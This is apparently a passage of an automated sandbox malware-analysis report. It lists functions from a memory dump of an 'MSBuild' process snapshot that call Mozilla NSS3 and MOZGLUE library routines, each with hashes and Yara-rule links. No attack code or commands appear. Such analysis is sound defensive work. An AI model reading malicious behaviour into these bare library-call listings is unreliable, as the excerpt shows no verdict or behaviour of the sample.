                                                                                        • Source File: 00000004.00000002.2383759564.000000006C601000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C600000, based on PE: true
                                                                                        • Associated: 00000004.00000002.2383730771.000000006C600000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2385733567.000000006C79F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2386069150.000000006C7DE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2386120788.000000006C7DF000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2386152856.000000006C7E0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2386187014.000000006C7E5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_6c600000_MSBuild.jbxd
                                                                                        Similarity
                                                                                        • API ID: Arena$Util$Alloc_AllocateArena_Value$CriticalEnterFreeInitLockPoolSectionUnlockcalloc
                                                                                        • String ID:
                                                                                        • API String ID: 2957673229-0
                                                                                        • Opcode ID: fde359a11de0bfe4845df7f2d5157b0e79017d69c9f1ce55be8417e26a882dd5
                                                                                        • Instruction ID: 31588aa4cf77a29865b1f12394975a65fedbc9ff22165f18d7a13baba91538c3
                                                                                        • Opcode Fuzzy Hash: fde359a11de0bfe4845df7f2d5157b0e79017d69c9f1ce55be8417e26a882dd5
                                                                                        • Instruction Fuzzy Hash: BD21D4B1D057425BE700CF25D944B52B7E4BFA9308F26C21AE81C8B662EB70E594C6D8
                                                                                        Function 6C70EDB0 Relevance: 6.1, APIs: 4, Instructions: 62memoryCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • PR_SetError.NSS3(FFFFE013,00000000,00000000,00000000,6C6F7FFA,?,6C6F9767,?,8B7874C0,0000A48E), ref: 6C70EDD4
                                                                                        • realloc.MOZGLUE(C7C1920F,?,00000000,00000000,6C6F7FFA,?,6C6F9767,?,8B7874C0,0000A48E), ref: 6C70EDFD
                                                                                        • PORT_Alloc_Util.NSS3(?,00000000,00000000,6C6F7FFA,?,6C6F9767,?,8B7874C0,0000A48E), ref: 6C70EE14
                                                                                          • Part of subcall function 6C6E0BE0: malloc.MOZGLUE(6C6D8D2D,?,00000000,?), ref: 6C6E0BF8
                                                                                          • Part of subcall function 6C6E0BE0: TlsGetValue.KERNEL32(6C6D8D2D,?,00000000,?), ref: 6C6E0C15
                                                                                        • memcpy.VCRUNTIME140(?,?,6C6F9767,00000000,00000000,6C6F7FFA,?,6C6F9767,?,8B7874C0,0000A48E), ref: 6C70EE33
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.2383759564.000000006C601000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C600000, based on PE: true
                                                                                        • Associated: 00000004.00000002.2383730771.000000006C600000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2385733567.000000006C79F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2386069150.000000006C7DE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2386120788.000000006C7DF000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2386152856.000000006C7E0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2386187014.000000006C7E5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_6c600000_MSBuild.jbxd
                                                                                        Similarity
                                                                                        • API ID: Alloc_ErrorUtilValuemallocmemcpyrealloc
                                                                                        • String ID:
                                                                                        • API String ID: 3903481028-0
                                                                                        • Opcode ID: fe94107a8829cf63efa36a772928672acaec4f87dfa2d70d2e976097fe70b7a2
                                                                                        • Instruction ID: ad430f5a91fd29175d7316fc3df3885092212ba6b2ef3646b01d02276de92adb
                                                                                        • Opcode Fuzzy Hash: fe94107a8829cf63efa36a772928672acaec4f87dfa2d70d2e976097fe70b7a2
                                                                                        • Instruction Fuzzy Hash: DC119EF1B0570EABEB109E65DE88B06B3ECFB0435DF244535E95986A00E731E464C7E2
                                                                                        Function 6C6A8DD0 Relevance: 6.1, APIs: 4, Instructions: 53COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.2383759564.000000006C601000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C600000, based on PE: true
                                                                                        • Associated: 00000004.00000002.2383730771.000000006C600000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2385733567.000000006C79F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2386069150.000000006C7DE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2386120788.000000006C7DF000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2386152856.000000006C7E0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2386187014.000000006C7E5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_6c600000_MSBuild.jbxd
                                                                                        Similarity
                                                                                        • API ID: CriticalEnterErrorSectionUnlockValue
                                                                                        • String ID:
                                                                                        • API String ID: 284873373-0
                                                                                        • Opcode ID: eee8eacd59e6b3e1aba2186626fc0f9b79bd9e16771a76425ae94fb09f893ba0
                                                                                        • Instruction ID: 990697c3d25a05d827ec3acd7fb39f5daf57a7e794fea0b5e62c0c839690f6a4
                                                                                        • Opcode Fuzzy Hash: eee8eacd59e6b3e1aba2186626fc0f9b79bd9e16771a76425ae94fb09f893ba0
                                                                                        • Instruction Fuzzy Hash: 8D114C71605A009BD700AF78D5885AABBF4FF09355F01496ADC88D7B00EB34E895CBD6
                                                                                        Function 6C72AC70 Relevance: 6.0, APIs: 4, Instructions: 49COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • PR_DestroyMonitor.NSS3(000A34B6,00000000,00000678,?,6C715F17,?,?,?,?,?,?,?,?,6C71AAD4), ref: 6C72AC94
                                                                                        • PK11_FreeSymKey.NSS3(08C483FF,00000000,00000678,?,6C715F17,?,?,?,?,?,?,?,?,6C71AAD4), ref: 6C72ACA6
                                                                                        • free.MOZGLUE(20868D04,?,?,?,?,?,?,?,?,6C71AAD4), ref: 6C72ACC0
                                                                                        • free.MOZGLUE(04C48300,?,?,?,?,?,?,?,?,6C71AAD4), ref: 6C72ACDB
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.2383759564.000000006C601000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C600000, based on PE: true
                                                                                        • Associated: 00000004.00000002.2383730771.000000006C600000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2385733567.000000006C79F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2386069150.000000006C7DE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2386120788.000000006C7DF000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2386152856.000000006C7E0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2386187014.000000006C7E5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_6c600000_MSBuild.jbxd
                                                                                        Similarity
                                                                                        • API ID: free$DestroyFreeK11_Monitor
                                                                                        • String ID:
                                                                                        • API String ID: 3989322779-0
                                                                                        • Opcode ID: 2b027931975ddffff221b6b8f97e20a555782d8b19cce44ccb23b1824c28feb2
                                                                                        • Instruction ID: deaa771a2a49725d231891784a859831685a8a50e200d78b3546366b10efe851
                                                                                        • Opcode Fuzzy Hash: 2b027931975ddffff221b6b8f97e20a555782d8b19cce44ccb23b1824c28feb2
                                                                                        • Instruction Fuzzy Hash: 2E015EB5701B119BE750DF29DA08753B7E8BF44669F504879D85AC3E00EB35F054CB91
                                                                                        Function 6C6EC590 Relevance: 6.0, APIs: 4, Instructions: 47COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • PORT_NewArena_Util.NSS3(00000800), ref: 6C6EC5AD
                                                                                          • Part of subcall function 6C6E0FF0: calloc.MOZGLUE(00000001,00000024,00000000,?,?,6C6887ED,00000800,6C67EF74,00000000), ref: 6C6E1000
                                                                                          • Part of subcall function 6C6E0FF0: PR_NewLock.NSS3(?,00000800,6C67EF74,00000000), ref: 6C6E1016
                                                                                          • Part of subcall function 6C6E0FF0: PL_InitArenaPool.NSS3(00000000,security,6C6887ED,00000008,?,00000800,6C67EF74,00000000), ref: 6C6E102B
                                                                                        • CERT_DecodeCertPackage.NSS3(?,?,6C6EC610,?), ref: 6C6EC5C2
                                                                                          • Part of subcall function 6C6EC0B0: PR_SetError.NSS3(FFFFE005,00000000), ref: 6C6EC0E6
                                                                                        • CERT_NewTempCertificate.NSS3(?,00000000,00000000,00000001), ref: 6C6EC5E0
                                                                                        • PORT_FreeArena_Util.NSS3(?,00000000), ref: 6C6EC5EF
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.2383759564.000000006C601000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C600000, based on PE: true
                                                                                        • Associated: 00000004.00000002.2383730771.000000006C600000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2385733567.000000006C79F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2386069150.000000006C7DE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2386120788.000000006C7DF000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2386152856.000000006C7E0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2386187014.000000006C7E5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_6c600000_MSBuild.jbxd
                                                                                        Similarity
                                                                                        • API ID: Arena_Util$ArenaCertCertificateDecodeErrorFreeInitLockPackagePoolTempcalloc
                                                                                        • String ID:
                                                                                        • API String ID: 1454898856-0
                                                                                        • Opcode ID: 1c65898ad02883bf1eb1ade0a8aa7733a7e2f3febfcd9c5c2b347bfee073c6ca
                                                                                        • Instruction ID: 30cd163698bebd5f2acc72eda7b3e5f0678c38bdf50a9f48a2b1e6c8af2e5923
                                                                                        • Opcode Fuzzy Hash: 1c65898ad02883bf1eb1ade0a8aa7733a7e2f3febfcd9c5c2b347bfee073c6ca
                                                                                        • Instruction Fuzzy Hash: 4F01A2B1E051087FEB00AB64DC06EBF7B78DB09618F45407AEC169B341F672AD18C6E9
                                                                                        Function 6C6E24E0 Relevance: 6.0, APIs: 4, Instructions: 46memoryCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,6C6BC154,000000FF,00000000,00000000,00000000,00000000,?,?,6C6BC154,?), ref: 6C6E24FA
                                                                                        • PORT_Alloc_Util.NSS3(00000000,?,6C6BC154,?), ref: 6C6E2509
                                                                                          • Part of subcall function 6C6E0BE0: malloc.MOZGLUE(6C6D8D2D,?,00000000,?), ref: 6C6E0BF8
                                                                                          • Part of subcall function 6C6E0BE0: TlsGetValue.KERNEL32(6C6D8D2D,?,00000000,?), ref: 6C6E0C15
                                                                                        • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,00000000,000000FF,00000000,00000000,?), ref: 6C6E2525
                                                                                        • free.MOZGLUE(00000000), ref: 6C6E2532
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.2383759564.000000006C601000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C600000, based on PE: true
                                                                                        • Associated: 00000004.00000002.2383730771.000000006C600000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2385733567.000000006C79F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2386069150.000000006C7DE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2386120788.000000006C7DF000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2386152856.000000006C7E0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2386187014.000000006C7E5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_6c600000_MSBuild.jbxd
                                                                                        Similarity
                                                                                        • API ID: ByteCharMultiWide$Alloc_UtilValuefreemalloc
                                                                                        • String ID:
                                                                                        • API String ID: 929835568-0
                                                                                        • Opcode ID: b25fff1505689ec5f5afdb183882f6a13ad443499d5d7486918236da9926276b
                                                                                        • Instruction ID: 8626fc94f56fd93e0525fcf26829d96197935adbd4b39434116a2071a7740eb1
                                                                                        • Opcode Fuzzy Hash: b25fff1505689ec5f5afdb183882f6a13ad443499d5d7486918236da9926276b
                                                                                        • Instruction Fuzzy Hash: 85F062B670A12636FA1026AA6C0DE773BADEB467F9B140272B928C66C0E951D801C1B5
                                                                                        Function 6C790660 Relevance: 6.0, APIs: 4, Instructions: 46COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • PR_DestroyLock.NSS3(?,00000000,00000000,?,?,6C797B1B,?,?,?,?,?,?,?,?,?,6C79798A), ref: 6C790670
                                                                                          • Part of subcall function 6C749EA0: DeleteCriticalSection.KERNEL32(?), ref: 6C749EAA
                                                                                        • free.MOZGLUE(?,00000000,00000000,?,?,6C797B1B,?,?,?,?,?,?,?,?,?,6C79798A), ref: 6C790696
                                                                                        • free.MOZGLUE(00000004,6C797B1B,?,?,?,?,?,?,?,?,?,6C79798A), ref: 6C7906C7
                                                                                        • free.MOZGLUE(?,00000000,00000000,?,?,6C797B1B,?,?,?,?,?,?,?,?,?,6C79798A), ref: 6C7906E9
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.2383759564.000000006C601000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C600000, based on PE: true
                                                                                        • Associated: 00000004.00000002.2383730771.000000006C600000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2385733567.000000006C79F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2386069150.000000006C7DE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2386120788.000000006C7DF000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2386152856.000000006C7E0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2386187014.000000006C7E5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_6c600000_MSBuild.jbxd
                                                                                        Similarity
                                                                                        • API ID: free$CriticalDeleteDestroyLockSection
                                                                                        • String ID:
                                                                                        • API String ID: 1785261712-0
                                                                                        • Opcode ID: c44c8e45534b85929ebb88a8da111d1259836abb7576f0afb76769e2b670aba9
                                                                                        • Instruction ID: 1fce956031c3e0dd5e1881c7267d27fbd2183857a55f53425fac36c13224edef
                                                                                        • Opcode Fuzzy Hash: c44c8e45534b85929ebb88a8da111d1259836abb7576f0afb76769e2b670aba9
                                                                                        • Instruction Fuzzy Hash: 9E116DFA7012219FEF40CF18D98AB0637B8F78E349F4941B5D40987612CB72E415CB96
                                                                                        Function 6C710450 Relevance: 6.0, APIs: 4, Instructions: 38synchronizationCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • ReleaseMutex.KERNEL32(40C70845,?,6C714710,?,000F4240,00000000), ref: 6C71046B
                                                                                        • GetLastError.KERNEL32(?,6C714710,?,000F4240,00000000), ref: 6C710479
                                                                                          • Part of subcall function 6C72BF80: TlsGetValue.KERNEL32(00000000,?,6C71461B,-00000004), ref: 6C72C244
                                                                                        • PR_Unlock.NSS3(40C70845,?,6C714710,?,000F4240,00000000), ref: 6C710492
                                                                                        • PR_SetError.NSS3(FFFFE89D,00000000,?,6C714710,?,000F4240,00000000), ref: 6C7104A5
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.2383759564.000000006C601000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C600000, based on PE: true
                                                                                        • Associated: 00000004.00000002.2383730771.000000006C600000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2385733567.000000006C79F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2386069150.000000006C7DE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2386120788.000000006C7DF000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2386152856.000000006C7E0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2386187014.000000006C7E5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_6c600000_MSBuild.jbxd
                                                                                        Similarity
                                                                                        • API ID: Error$LastMutexReleaseUnlockValue
                                                                                        • String ID:
                                                                                        • API String ID: 4014558462-0
                                                                                        • Opcode ID: 9da645683e173e8453c00eb02a851ba1fbeabf6a3d051cd4a5d9674ea67bde43
                                                                                        • Instruction ID: 80a8e8724477aa4677c251f61a45e543ce63841b5ced2e28f584caa654b5cdc0
                                                                                        • Opcode Fuzzy Hash: 9da645683e173e8453c00eb02a851ba1fbeabf6a3d051cd4a5d9674ea67bde43
                                                                                        • Instruction Fuzzy Hash: D9F0B470B082455BEB10AAB69E9CF1A33A99B0630EF1C8435EC1AC7E50EE25E564C651
                                                                                        Function 6C79CC50 Relevance: 6.0, APIs: 4, Instructions: 29COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.2383759564.000000006C601000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C600000, based on PE: true
                                                                                        • Associated: 00000004.00000002.2383730771.000000006C600000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2385733567.000000006C79F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2386069150.000000006C7DE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2386120788.000000006C7DF000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2386152856.000000006C7E0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2386187014.000000006C7E5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_6c600000_MSBuild.jbxd
                                                                                        Similarity
                                                                                        • API ID: CriticalDeleteSectionfree
                                                                                        • String ID:
                                                                                        • API String ID: 2988086103-0
                                                                                        • Opcode ID: 79339e7d5ff0e0694d30d5cea5effb2f38f5833468e5ba590e933bf2d48d0717
                                                                                        • Instruction ID: a51ddec809f994fad687f11c1af9de6aea18e7928af77ed8186dfd4dd8a360eb
                                                                                        • Opcode Fuzzy Hash: 79339e7d5ff0e0694d30d5cea5effb2f38f5833468e5ba590e933bf2d48d0717
                                                                                        • Instruction Fuzzy Hash: 8FE030767006189BCA10EFA8DC4488677ACEF892717150565E691C3700D631F905CBA1
                                                                                        Function 6C6D4D10 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 106COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • PR_SetError.NSS3(FFFFE001,00000000), ref: 6C6D4D57
                                                                                        • PR_snprintf.NSS3(?,00000008,%d.%d,?,?), ref: 6C6D4DE6
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.2383759564.000000006C601000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C600000, based on PE: true
                                                                                        • Associated: 00000004.00000002.2383730771.000000006C600000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2385733567.000000006C79F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2386069150.000000006C7DE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2386120788.000000006C7DF000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2386152856.000000006C7E0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2386187014.000000006C7E5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_6c600000_MSBuild.jbxd
                                                                                        Similarity
                                                                                        • API ID: ErrorR_snprintf
                                                                                        • String ID: %d.%d
                                                                                        • API String ID: 2298970422-3954714993
                                                                                        • Opcode ID: f0bee9b44e123ca0a154ad535393036b427e22140593c822a5098c9c06976302
                                                                                        • Instruction ID: a27f0b29cb8684995bb061176784ef140cdcc551826caeb2bae6ae6b72913ad0
                                                                                        • Opcode Fuzzy Hash: f0bee9b44e123ca0a154ad535393036b427e22140593c822a5098c9c06976302
                                                                                        • Instruction Fuzzy Hash: 4C31FCB2D042186BEB109FA09C05BFF77A8DF45308F060429ED15AB781EB70AD05CBE9
                                                                                        Function 6C6F4CF0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 43COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • SECOID_FindOIDByTag_Util.NSS3('8ol,00000000,00000000,?,?,6C6F3827,?,00000000), ref: 6C6F4D0A
                                                                                          • Part of subcall function 6C6E0840: PR_SetError.NSS3(FFFFE08F,00000000), ref: 6C6E08B4
                                                                                        • SECITEM_ItemsAreEqual_Util.NSS3(00000000,00000000,00000000), ref: 6C6F4D22
                                                                                          • Part of subcall function 6C6DFD30: memcmp.VCRUNTIME140(?,AF840FC0,8B000000,?,6C681A3E,00000048,00000054), ref: 6C6DFD56
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.2383759564.000000006C601000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C600000, based on PE: true
                                                                                        • Associated: 00000004.00000002.2383730771.000000006C600000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2385733567.000000006C79F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2386069150.000000006C7DE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2386120788.000000006C7DF000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2386152856.000000006C7E0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2386187014.000000006C7E5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_6c600000_MSBuild.jbxd
                                                                                        Similarity
                                                                                        • API ID: Util$Equal_ErrorFindItemsTag_memcmp
                                                                                        • String ID: '8ol
                                                                                        • API String ID: 1521942269-2428020392
                                                                                        • Opcode ID: 14028aa1c084b1134f31e0fe545c68cf4cce508ec734b29011f619df16d7203e
                                                                                        • Instruction ID: 2f64a8f609eebc25983a0e1082c99bb21639570ee83175f43e3dbdd2e278e4ee
                                                                                        • Opcode Fuzzy Hash: 14028aa1c084b1134f31e0fe545c68cf4cce508ec734b29011f619df16d7203e
                                                                                        • Instruction Fuzzy Hash: EEF09C3260112467DB104E6A9D4075336DDAB457FDF250271DD38CBB91E6B1DC02C6F5
                                                                                        Function 6C6E0DB0 Relevance: 5.1, APIs: 4, Instructions: 97COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.2383759564.000000006C601000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C600000, based on PE: true
                                                                                        • Associated: 00000004.00000002.2383730771.000000006C600000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2385733567.000000006C79F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2386069150.000000006C7DE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2386120788.000000006C7DF000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2386152856.000000006C7E0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2386187014.000000006C7E5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_6c600000_MSBuild.jbxd
                                                                                        Similarity
                                                                                        • API ID: Value$calloc
                                                                                        • String ID:
                                                                                        • API String ID: 3339632435-0
                                                                                        • Opcode ID: d8d179b2a041a6eda907c8ec9446b0d1fd0298b4bb0194298672ae045629ab6a
                                                                                        • Instruction ID: bfb7a40ed15f9b4772ccc8ff9b1b231af3686a0d204c0b52f0c27ed41ccfd4c3
                                                                                        • Opcode Fuzzy Hash: d8d179b2a041a6eda907c8ec9446b0d1fd0298b4bb0194298672ae045629ab6a
                                                                                        • Instruction Fuzzy Hash: 5F31087164A3858BDB105F7CD4442A977B4BF0E308F11467AD888C7A21DF34D087DB99
                                                                                        Function 6C63A4E0 Relevance: 5.1, APIs: 4, Instructions: 75stringCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,?,6C63A468,00000000), ref: 6C63A4F9
                                                                                        • strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,6C63A468,00000000), ref: 6C63A51B
                                                                                        • strlen.API-MS-WIN-CRT-STRING-L1-1-0(6C63A468,?,6C63A468,00000000), ref: 6C63A545
                                                                                        • memcpy.VCRUNTIME140(00000001,6C63A468,00000001,?,?,?,6C63A468,00000000), ref: 6C63A57D
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.2383759564.000000006C601000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C600000, based on PE: true
                                                                                        • Associated: 00000004.00000002.2383730771.000000006C600000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2385733567.000000006C79F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2386069150.000000006C7DE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2386120788.000000006C7DF000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2386152856.000000006C7E0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2386187014.000000006C7E5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_6c600000_MSBuild.jbxd
                                                                                        Similarity
                                                                                        • API ID: strlen$memcpy
                                                                                        • String ID:
                                                                                        • API String ID: 3396830738-0
                                                                                        • Opcode ID: 600eb8a033a5ca9a43437b08be08586c367961074f3215d643a34829541b8b4a
                                                                                        • Instruction ID: e20dce63bbdac6e90c8b37e193f772a6d5a4f20201ef416c3106546ad3270085
                                                                                        • Opcode Fuzzy Hash: 600eb8a033a5ca9a43437b08be08586c367961074f3215d643a34829541b8b4a
                                                                                        • Instruction Fuzzy Hash: FA1106F3D0032557DF0089F99C856EB7799AF95278F281234ED28877C1F635990882F1